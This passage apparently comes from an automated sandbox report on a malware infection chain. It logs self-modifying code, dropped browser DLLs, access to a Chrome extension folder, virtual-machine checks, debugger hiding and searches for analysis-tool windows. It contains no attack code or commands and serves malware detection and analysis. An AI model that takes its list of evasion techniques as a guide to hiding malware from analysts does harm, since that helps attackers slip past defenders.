                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 35EE56 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 4F76BE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 5803DB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSpecial instruction interceptor: First address: 62F1B8 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSpecial instruction interceptor: First address: 7CC545 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSpecial instruction interceptor: First address: 7F1934 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSpecial instruction interceptor: First address: 857B16 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSpecial instruction interceptor: First address: 86FE13 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSpecial instruction interceptor: First address: A25922 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSpecial instruction interceptor: First address: A9D5E7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSpecial instruction interceptor: First address: 79DD6D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSpecial instruction interceptor: First address: 79DDED instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSpecial instruction interceptor: First address: 9726C9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSpecial instruction interceptor: First address: 9DF3EA instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSpecial instruction interceptor: First address: 604FE13 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSpecial instruction interceptor: First address: 6205922 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSpecial instruction interceptor: First address: 627D5E7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSpecial instruction interceptor: First address: 7A4CC4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeMemory allocated: 4E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeMemory allocated: 5190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeMemory allocated: 4FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeMemory allocated: 4FA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeMemory allocated: 51B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeMemory allocated: 71B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_04A7029D rdtsc 9_2_04A7029D
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 374Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4209Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2068Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2420
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1308
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeAPI coverage: 9.7 %
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5220Thread sleep count: 102 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5220Thread sleep time: -204102s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5088Thread sleep count: 93 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5088Thread sleep time: -186093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1376Thread sleep count: 96 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1376Thread sleep time: -192096s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052Thread sleep count: 374 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052Thread sleep time: -11220000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4940Thread sleep count: 74 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4940Thread sleep time: -148074s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7964Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep count: 89 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep time: -178089s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4956Thread sleep count: 83 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4956Thread sleep time: -166083s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe TID: 5232Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe TID: 6272Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe TID: 7508Thread sleep time: -240000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe TID: 8028Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe TID: 5168Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe TID: 5288Thread sleep time: -90000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe TID: 5288Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe TID: 2492Thread sleep time: -72000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeLast function: Thread delayed
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6EEBF0 PR_GetNumberOfProcessors,GetSystemInfo,0_2_6C6EEBF0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: file.exe, file.exe, 00000000.00000002.1958879838.0000000000F25000.00000040.00000001.01000000.00000003.sdmp, DocumentsDGHCBAAEHC.exe, DocumentsDGHCBAAEHC.exe, 00000009.00000002.2045089786.000000000042B000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 0000000A.00000002.2075381894.00000000004DB000.00000040.00000001.01000000.0000000E.sdmp, c61fcc859d.exe, 00000017.00000002.2795121573.00000000061D5000.00000040.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2779682677.00000000007AA000.00000040.00000001.01000000.00000014.sdmp, 309de20225.exe, 00000018.00000002.2623475534.00000000009F5000.00000040.00000001.01000000.00000015.sdmp, c2bb02869b.exe, 0000001D.00000002.2791255301.000000000092F000.00000040.00000001.01000000.00000016.sdmp, c61fcc859d.exe, 0000001E.00000002.2746388497.00000000007AA000.00000040.00000001.01000000.00000014.sdmp, 309de20225.exe, 0000001F.00000002.2847654197.00000000009F5000.00000040.00000001.01000000.00000015.sdmp, c2bb02869b.exe, 00000020.00000002.2915011392.000000000092F000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: Amcache.hve.22.drBinary or memory string: VMware
                    Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.22.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.22.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.22.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.22.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2528818634.00000000031FB000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2527946304.00000000031BC000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2781937104.000000000100E000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 00000018.00000002.2626496741.0000000000D34000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 00000018.00000002.2626496741.0000000000D61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: file.exe, 00000000.00000002.1958471071.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware1
                    Source: Amcache.hve.22.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.22.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: powershell.exe, 0000000D.00000002.2515431048.00000144F417F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\w
                    Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: pidgeon.exe, 0000000C.00000002.2973695706.000000000166C000.00000004.00000020.00020000.00000000.sdmp, pidgeon.exe, 00000019.00000002.2973734598.0000000001677000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2528818634.00000000031FB000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
                    Source: Amcache.hve.22.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.22.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: powershell.exe, 0000000D.00000002.2515431048.00000144F417F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\:
                    Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.22.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.22.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: c61fcc859d.exe, 0000001E.00000002.2747957835.0000000001317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                    Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.22.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: powershell.exe, 0000000D.00000002.2515731401.00000144F435C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}00/7
                    Source: Amcache.hve.22.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.22.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: file.exe, 00000000.00000002.1958879838.0000000000F25000.00000040.00000001.01000000.00000003.sdmp, DocumentsDGHCBAAEHC.exe, 00000009.00000002.2045089786.000000000042B000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2075381894.00000000004DB000.00000040.00000001.01000000.0000000E.sdmp, c61fcc859d.exe, 00000017.00000002.2795121573.00000000061D5000.00000040.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2779682677.00000000007AA000.00000040.00000001.01000000.00000014.sdmp, 309de20225.exe, 00000018.00000002.2623475534.00000000009F5000.00000040.00000001.01000000.00000015.sdmp, c2bb02869b.exe, 0000001D.00000002.2791255301.000000000092F000.00000040.00000001.01000000.00000016.sdmp, c61fcc859d.exe, 0000001E.00000002.2746388497.00000000007AA000.00000040.00000001.01000000.00000014.sdmp, 309de20225.exe, 0000001F.00000002.2847654197.00000000009F5000.00000040.00000001.01000000.00000015.sdmp, c2bb02869b.exe, 00000020.00000002.2915011392.000000000092F000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: crypted.exe, 00000013.00000003.2494094671.0000000004C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &vmcI:!
                    Source: Amcache.hve.22.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeThread information set: HideFromDebugger
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess queried: DebugPort
